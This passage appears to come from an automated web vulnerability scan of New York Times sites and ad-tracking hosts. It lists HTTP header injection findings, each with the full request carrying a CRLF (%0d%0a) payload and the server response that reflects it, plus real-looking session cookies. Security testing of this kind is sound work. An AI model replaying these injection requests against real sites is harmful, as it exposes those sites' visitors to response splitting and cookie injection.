HTTP/1.1 302 Moved Temporarily Date: Sat, 13 Nov 2010 02:06:01 GMT Location: https://careers.nytco.com/psc/TAM/EMPLOYEE/7fc66 8dd5b3d6a61/c/HRS_HRAM.HRS_CE.GBL?& Content-Type: text/html Set-Cookie: nyhq-hpw-hrrp2-80-PORTAL-PSJSESSIONID=MdyJzJTQg31ZypJwG88s70yLh2LJnTcg!-9483320; path=/ Set-Cookie: NCES_nyhq-hpw-hrrp2-80-PORTAL-PSJSESSIONID=pv96knwIQLv8M6q+0wxVNoOH8UELVDAjmi5lOFUVLvLHLUcMZEE4VI+/2ppEGLojoOblLO2MXE0zbBLPh4G9gikNQpZ1CNnvWvuuqEYaNeD+zsteWFi355m2PmuxZ9pj++X8MGRqkm2QgXCsJaP58kYmNVL+5vSy; path=/ Content-Length: 373
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://careers.nytco.com/psc/TAM/ ...[SNIP]...
|
2.13. https://careers.nytco.com/psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL [REST URL parameter 5]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
https://careers.nytco.com |
Path: |
/psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL |
Issue detail
The value of REST URL parameter 5 is copied into the Location response header. The payload 122a5%0d%0af997558f359 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /psc/TAM/EMPLOYEE/HRMS/122a5%0d%0af997558f359/HRS_HRAM.HRS_CE.GBL HTTP/1.1 Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */* Referer: https://careers.nytco.com/TAM/nyt_docs/TAM/candidate.html Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: careers.nytco.com Connection: Keep-Alive Cookie: __utma=236704414.2109174387.1289612695.1289612695.1289612695.1; __utmb=236704414; __utmz=236704414.1289612695.1.1.utmccn=(referral)|utmcsr=nytimes.com|utmcct=/timeswire/index.html|utmcmd=referral; __utmc=236704414
|
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 13 Nov 2010 02:06:01 GMT Location: https://careers.nytco.com/psc/TAM/EMPLOYEE/HRMS/122a5 f997558f359/HRS_HRAM.HRS_CE.GBL?& Content-Type: text/html Set-Cookie: nyhq-hpw-hrrp2-80-PORTAL-PSJSESSIONID=MdyJFm1qTLtKy2GrV8L5Ldmky3htJyGD!-9483320; path=/ Set-Cookie: NCES_nyhq-hpw-hrrp2-80-PORTAL-PSJSESSIONID=6zUc1Hr+hS8fzguR93ZUHsyJw2D+pTonngW4GKmuJP1Uu6XCofTPdoPRiY6t6ilNZb3U41AiOXsvgiZZ4b7ONkeraFa7TgACwmKFYbx6fq6Xn6F1I/aTFXpFXDJSkH7qUlFP9FTkvXZKz6nzhK0SmMV8P2IqxLgs; path=/ Content-Length: 379
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://careers.nytco.com/psc/TAM/ ...[SNIP]...
|
2.14. https://careers.nytco.com/psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL [REST URL parameter 6]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
https://careers.nytco.com |
Path: |
/psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL |
Issue detail
The value of REST URL parameter 6 is copied into the Location response header. The payload bda3d%0d%0a16b48f1ff0c was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.
Request
GET /psc/TAM/EMPLOYEE/HRMS/c/bda3d%0d%0a16b48f1ff0c HTTP/1.1 Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */* Referer: https://careers.nytco.com/TAM/nyt_docs/TAM/candidate.html Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: careers.nytco.com Connection: Keep-Alive Cookie: __utma=236704414.2109174387.1289612695.1289612695.1289612695.1; __utmb=236704414; __utmz=236704414.1289612695.1.1.utmccn=(referral)|utmcsr=nytimes.com|utmcct=/timeswire/index.html|utmcmd=referral; __utmc=236704414
|
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 13 Nov 2010 02:06:01 GMT Location: https://careers.nytco.com/psc/TAM/EMPLOYEE/HRMS/c/bda3d 16b48f1ff0c?& Content-Type: text/html Set-Cookie: nyhq-hpw-hrrp2-80-PORTAL-PSJSESSIONID=MdyJR4BQYkGJqp5ZL2X8GZGbXcMSf98p!-9483320; path=/ Set-Cookie: NCES_nyhq-hpw-hrrp2-80-PORTAL-PSJSESSIONID=7t0h06Q/IRWLHue1c9MOGG3EKVj3snl0QIoYoY3JzcLvmvO9K8XlUvIN6Y8k7AxfIBUNxUC3514n2pcAQA2hW+2E3lO6ayKzaN3t3KdXF+99ca85Af21gWJmvWwcZWSQIk43wSRWOFf+SzvaJVxjU/d5Uq6c9VPt; path=/ Content-Length: 343
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://careers.nytco.com/psc/TAM/ ...[SNIP]...
|
2.15. http://movies2.nytimes.com/gst/movies/movie.html [REST URL parameter 1]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://movies2.nytimes.com |
Path: |
/gst/movies/movie.html |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 7a35a%0d%0a19b04d91325 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /7a35a%0d%0a19b04d91325/movies/movie.html?v_id=451514 HTTP/1.1 Host: movies2.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:07:15 GMT Content-length: 0 Content-type: text/html Location: http://movies.nytimes.com/pages/movies/index.html/7a35a 19b04d91325/movies/movie.html?v_id=451514
|
2.16. http://movies2.nytimes.com/gst/movies/movie.html [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://movies2.nytimes.com |
Path: |
/gst/movies/movie.html |
Issue detail
The value of REST URL parameter 2 is copied into the Location response header. The payload 5a82d%0d%0adf25b0b4f75 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /gst/5a82d%0d%0adf25b0b4f75/movie.html?v_id=451514 HTTP/1.1 Host: movies2.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:08:05 GMT Content-length: 0 Content-type: text/html Location: http://movies.nytimes.com/pages/movies/index.html/gst/5a82d df25b0b4f75/movie.html?v_id=451514
|
2.17. http://movies2.nytimes.com/gst/movies/movie.html [REST URL parameter 3]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://movies2.nytimes.com |
Path: |
/gst/movies/movie.html |
Issue detail
The value of REST URL parameter 3 is copied into the Location response header. The payload e822f%0d%0a652f2e24a5a was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /gst/movies/e822f%0d%0a652f2e24a5a?v_id=451514 HTTP/1.1 Host: movies2.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:08:10 GMT Content-length: 0 Content-type: text/html Location: http://movies.nytimes.com/pages/movies/index.html/gst/movies/e822f 652f2e24a5a?v_id=451514
|
2.18. http://na.link.decdna.net/n/78471/87266/ad.vulnerable.ad.partner/dfwcxw [11;4;;8;;cmwtbr;1lqc0s;;dml15;;1;/i/c?0&pq parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://na.link.decdna.net |
Path: |
/n/78471/87266/ad.vulnerable.ad.partner/dfwcxw |
Issue detail
The value of the 11;4;;8;;cmwtbr;1lqc0s;;dml15;;1;/i/c?0&pq request parameter is copied into the location response header. The payload 52713%0d%0a256b90df09e was submitted in the 11;4;;8;;cmwtbr;1lqc0s;;dml15;;1;/i/c?0&pq parameter. This caused a response containing an injected HTTP header.
Request
GET /n/78471/87266/ad.vulnerable.ad.partner/dfwcxw;11;4;;8;;cmwtbr;1lqc0s;;dml15;;1;/i/c?0&pq=52713%0d%0a256b90df09e&247cr=4059381386 HTTP/1.1 Host: na.link.decdna.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 02:06:42 GMT Server: Apache/1.3.33 (Unix) Pragma: no-cache Expires: Sat, 13 Nov 2010 02:06:42 GMT location: http://ad.vulnerable.ad.partner52713 256b90df09e Set-Cookie: %2edecdna%2enet/%2fn%2f78471/2/e=1289614002/78471/87266/1/0//8///764076663/0/0/96966748///0/1289614002/ct%2c/0/http%3a%2f%2fad%2edoubleclick%2enet52713%0d%0a256b90df09e/22888697/4059381386; expires=Mon, 13-Dec-2010 02:06:42 GMT; path=/n/78471; domain=.decdna.net; P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS COM NAV INT" Set-Cookie: id=9286422803672728651; expires=Sun, 13-Nov-2011 02:06:42 GMT; path=/; domain=.decdna.net; Set-Cookie: name=9286422803672729261; path=/; domain=.decdna.net; Content-Length: 0 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
|
2.19. http://na.link.decdna.net/n/78471/87266/ad.vulnerable.ad.partner/dfwcxw [REST URL parameter 4]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://na.link.decdna.net |
Path: |
/n/78471/87266/ad.vulnerable.ad.partner/dfwcxw |
Issue detail
The value of REST URL parameter 4 is copied into the location response header. The payload 493a9%0d%0a20f05077930 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /n/78471/87266/493a9%0d%0a20f05077930/dfwcxw;11;4;;8;;cmwtbr;1lqc0s;;dml15;;1;/i/c?0&pq=%2fclk%3b222387429%3b46056971%3bq%3fhttp%3a%2f%2fr%2eclickforensics%2ecom%2f2464%2fC029ED6A4E%2fwww%2ehelppreventhepatitis%2ecom%2fhelp%2dprotect%2dyourself%2fhepatitis%2dprotection%2ehtml%3frotation%3d46056971%26banner%3d222387429%26src%3d1%26kw%3dp&247cr=4059381386 HTTP/1.1 Host: na.link.decdna.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 02:06:45 GMT Server: Apache/1.3.33 (Unix) Pragma: no-cache Expires: Sat, 13 Nov 2010 02:06:45 GMT location: http://493a9 20f05077930/clk;222387429;46056971;q?http://r.clickforensics.com/2464/C029ED6A4E/www.helppreventhepatitis.com/help-protect-yourself/hepatitis-protection.html?rotation=46056971&banner=222387429&src=1&kw=p Set-Cookie: %2edecdna%2enet/%2fn%2f78471/2/e=1289614005/78471/87266/1/0//8///764076663/0/0/96966748///0/1289614005/ct%2c/0/http%3a%2f%2f493a9%0d%0a20f05077930%2fclk%3b222387429%3b46056971%3bq%3fhttp%3a%2f%2fr%2eclickforensics%2ecom%2f2464%2fC029ED6A4E%2fwww%2ehelppreventhepatitis%2ecom%2fhelp%2dprotect%2dyourself%2fhepatitis%2dprotection%2ehtml%3frotation%3d46056971%26banner%3d222387429%26src%3d1%26kw%3dp/22888697/4059381386; expires=Mon, 13-Dec-2010 02:06:45 GMT; path=/n/78471; domain=.decdna.net; P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS COM NAV INT" Set-Cookie: id=9286422803941163528; expires=Sun, 13-Nov-2011 02:06:45 GMT; path=/; domain=.decdna.net; Set-Cookie: name=9286422803941163819; path=/; domain=.decdna.net; Content-Length: 0 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
|
2.20. http://nytimes.com/ref/membercenter/help/infoservdirectory.html [REST URL parameter 1]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://nytimes.com |
Path: |
/ref/membercenter/help/infoservdirectory.html |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload f7dbb%0d%0aef896eaeb9a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /f7dbb%0d%0aef896eaeb9a/membercenter/help/infoservdirectory.html HTTP/1.1 Host: nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289610004728:ss=1289608767320; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD3ABC3AB810AB0730A00703; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD3ABC3AB810AB0730A00703; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:07:13 GMT Content-length: 122 Content-type: text/html Location: http://www.nytimes.com/f7dbb ef896eaeb9a/membercenter/help/infoservdirectory.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.21. http://nytimes.com/ref/membercenter/help/infoservdirectory.html [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://nytimes.com |
Path: |
/ref/membercenter/help/infoservdirectory.html |
Issue detail
The value of REST URL parameter 2 is copied into the Location response header. The payload c6f96%0d%0a63068f27cab was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /ref/c6f96%0d%0a63068f27cab/help/infoservdirectory.html HTTP/1.1 Host: nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289610004728:ss=1289608767320; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD3ABC3AB810AB0730A00703; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD3ABC3AB810AB0730A00703; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:08:00 GMT Content-length: 122 Content-type: text/html Location: http://www.nytimes.com/ref/c6f96 63068f27cab/help/infoservdirectory.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.22. http://nytimes.com/ref/membercenter/help/infoservdirectory.html [REST URL parameter 3]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://nytimes.com |
Path: |
/ref/membercenter/help/infoservdirectory.html |
Issue detail
The value of REST URL parameter 3 is copied into the Location response header. The payload d8dfd%0d%0a52675aa17e1 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /ref/membercenter/d8dfd%0d%0a52675aa17e1/infoservdirectory.html HTTP/1.1 Host: nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289610004728:ss=1289608767320; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD3ABC3AB810AB0730A00703; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD3ABC3AB810AB0730A00703; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:08:00 GMT Content-length: 122 Content-type: text/html Location: http://www.nytimes.com/ref/membercenter/d8dfd 52675aa17e1/infoservdirectory.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.23. http://nytimes.com/ref/membercenter/help/infoservdirectory.html [REST URL parameter 4]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://nytimes.com |
Path: |
/ref/membercenter/help/infoservdirectory.html |
Issue detail
The value of REST URL parameter 4 is copied into the Location response header. The payload ba656%0d%0ac1c6899a20 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /ref/membercenter/help/ba656%0d%0ac1c6899a20 HTTP/1.1 Host: nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289610004728:ss=1289608767320; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD3ABC3AB810AB0730A00703; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD3ABC3AB810AB0730A00703; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:07:59 GMT Content-length: 122 Content-type: text/html Location: http://www.nytimes.com/ref/membercenter/help/ba656 c1c6899a20 Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.24. http://nytimes.com/rss [REST URL parameter 1]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://nytimes.com |
Path: |
/rss |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 7df2a%0d%0a5589811a206 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /7df2a%0d%0a5589811a206 HTTP/1.1 Host: nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289610004728:ss=1289608767320; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD3ABC3AB810AB0730A00703; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD3ABC3AB810AB0730A00703; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:07:11 GMT Content-length: 122 Content-type: text/html Location: http://www.nytimes.com/7df2a 5589811a206 Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.25. http://pixel2519.everesttech.net/2519/rq/3/c_a8ccd1264e488999b21c12b5c7cd18c1_5314096229/url=http:/clickserve.dartsearch.net/link/click [REST URL parameter 3]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://pixel2519.everesttech.net |
Path: |
/2519/rq/3/c_a8ccd1264e488999b21c12b5c7cd18c1_5314096229/url=http:/clickserve.dartsearch.net/link/click |
Issue detail
The value of REST URL parameter 3 is copied into the Set-Cookie response header. The payload 56e58%0d%0ad99abd59502 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /2519/rq/56e58%0d%0ad99abd59502/c_a8ccd1264e488999b21c12b5c7cd18c1_5314096229/url=http:/clickserve.dartsearch.net/link/click HTTP/1.1 Host: pixel2519.everesttech.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 02:36:36 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8k Set-Cookie: everest_session_v2=7KpM3fm0AwAAKus; path=/; domain=.everesttech.net Set-Cookie: everest_g_v2=g_surferid~7KpM3fm0AwAAKus; path=/; domain=.everesttech.net; expires=Sat, 17-Nov-2029 13:16:36 GMT P3P: CP="NOI NID DEVa PSAa PSDa OUR IND PUR COM NAV INT DEM" Cache-Control: no-cache, max-age=0 Set-Cookie: everest_cookie=ev_surferid~7KpM3fm0AwAAKus~ev_uid~2519~ev_sid~56e58 d99abd59502~ev_clientid~c_a8ccd1264e488999b21c12b5c7cd18c1_5314096229~ev_clickid~7KpM3fm0AwAAKus~ev_clicktime~20101113023636; path=/; domain=pixel2519.everesttech.net; expires=Sat, 17-Nov-2029 13:16:36 GMT Location: http://clickserve.dartsearch.net/link/click?ev_userid=2519&ev_sid=56e58 d99abd59502&ev_clientid=c_a8ccd1264e488999b21c12b5c7cd18c1_5314096229&url=http:/clickserve.dartsearch.net/link/click&ef_id=7KpM3fm0AwAAKus:20101113023636:s Expires: Sat, 13 Nov 2010 02:36:36 GMT Content-Length: 547 Keep-Alive: timeout=15, max=584 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://clickserve.dartsearch.net/link/click?ev_ ...[SNIP]...
|
2.26. http://pixel2519.everesttech.net/2519/rq/3/c_a8ccd1264e488999b21c12b5c7cd18c1_5314096229/url=http:/clickserve.dartsearch.net/link/click [REST URL parameter 4]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://pixel2519.everesttech.net |
Path: |
/2519/rq/3/c_a8ccd1264e488999b21c12b5c7cd18c1_5314096229/url=http:/clickserve.dartsearch.net/link/click |
Issue detail
The value of REST URL parameter 4 is copied into the Set-Cookie response header. The payload b5412%0d%0acbbc9e6376e was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /2519/rq/3/b5412%0d%0acbbc9e6376e/url=http:/clickserve.dartsearch.net/link/click HTTP/1.1 Host: pixel2519.everesttech.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 02:36:36 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8k Set-Cookie: everest_session_v2=s5ZM3fm0AQAAAaI; path=/; domain=.everesttech.net Set-Cookie: everest_g_v2=g_surferid~s5ZM3fm0AQAAAaI; path=/; domain=.everesttech.net; expires=Sat, 17-Nov-2029 13:16:36 GMT P3P: CP="NOI NID DEVa PSAa PSDa OUR IND PUR COM NAV INT DEM" Cache-Control: no-cache, max-age=0 Set-Cookie: everest_cookie=ev_surferid~s5ZM3fm0AQAAAaI~ev_uid~2519~ev_sid~3~ev_clientid~b5412 cbbc9e6376e~ev_clickid~s5ZM3fm0AQAAAaI~ev_clicktime~20101113023636; path=/; domain=pixel2519.everesttech.net; expires=Sat, 17-Nov-2029 13:16:36 GMT Location: http://clickserve.dartsearch.net/link/click?ev_userid=2519&ev_sid=3&ev_clientid=b5412 cbbc9e6376e&url=http:/clickserve.dartsearch.net/link/click&ef_id=s5ZM3fm0AQAAAaI:20101113023636:s Expires: Sat, 13 Nov 2010 02:36:36 GMT Content-Length: 503 Keep-Alive: timeout=15, max=553 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://clickserve.dartsearch.net/link/click?ev_ ...[SNIP]...
|
2.27. http://theater2.nytimes.com/gst/theater/tabclist.html [REST URL parameter 1]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://theater2.nytimes.com |
Path: |
/gst/theater/tabclist.html |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 89d8a%0d%0af550ad8fb26 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /89d8a%0d%0af550ad8fb26/theater/tabclist.html HTTP/1.1 Host: theater2.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:38:59 GMT Content-length: 0 Content-type: text/html Location: http://theater.nytimes.com/89d8a f550ad8fb26/theater/tabclist.html
|
2.28. http://theater2.nytimes.com/gst/theater/tabclist.html [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://theater2.nytimes.com |
Path: |
/gst/theater/tabclist.html |
Issue detail
The value of REST URL parameter 2 is copied into the Location response header. The payload 99ac1%0d%0aaf9b8979722 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /gst/99ac1%0d%0aaf9b8979722/tabclist.html HTTP/1.1 Host: theater2.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:38:59 GMT Content-length: 0 Content-type: text/html Location: http://theater.nytimes.com/gst/99ac1 af9b8979722/tabclist.html
|
2.29. http://theater2.nytimes.com/gst/theater/tabclist.html [REST URL parameter 3]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://theater2.nytimes.com |
Path: |
/gst/theater/tabclist.html |
Issue detail
The value of REST URL parameter 3 is copied into the Location response header. The payload dbbee%0d%0adec65f30f2e was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /gst/theater/dbbee%0d%0adec65f30f2e HTTP/1.1 Host: theater2.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:38:59 GMT Content-length: 0 Content-type: text/html Location: http://theater.nytimes.com/gst/theater/dbbee dec65f30f2e
|
2.30. http://topics.nytimes.com/top/news/business/companies/facebook_inc/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/news/business/companies/facebook_inc/ |
Issue detail
The value of REST URL parameter 2 is copied into the Location response header. The payload aa7f7%0d%0ac83acbda829 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
